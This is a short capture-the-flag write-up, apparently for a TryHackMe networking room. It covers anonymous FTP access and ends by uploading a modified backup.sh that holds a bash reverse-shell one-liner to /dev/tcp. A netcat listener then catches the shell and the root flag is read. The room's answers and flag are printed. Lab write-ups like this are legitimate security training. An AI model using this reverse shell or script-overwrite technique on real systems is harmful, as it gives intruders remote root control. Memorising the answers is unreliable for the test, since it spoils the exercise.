Anyone can be Santa!

Networking - FTP

Video

Resources

The standard for these two connections are the two ports:

• Port 20 (Data)

• Port 21 (Commands)

pentesters cheatsheet

bash -i >& /dev/tcp/Your_TryHackMe_IP/4444 0>&1

Challenge

Name the directory on the FTP server that has data accessible by the "anonymous" user

ftp 10.10.130.142
anonymous
ls

public

What script gets executed within this directory?

ftp 10.10.130.142
anonymous
ls
cd public
ls

backup.sh

What movie did Santa have on his Christmas shopping list?

ftp 10.10.130.142
anonymous
cd public
get shoppinglist.txt
quit
cat shoppinglist.txt

The Polar Express

Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!

Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have set up a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.

ftp 10.10.130.142
anonymous
cd public
get backup.sh

vi backup.sh

bash -i >& /dev/tcp/10.14.4.204/4444 0>&1

put backup.sh

nc -lnp 4444
cd /root
cat flag.txt

THM{even_you_can_be_santa}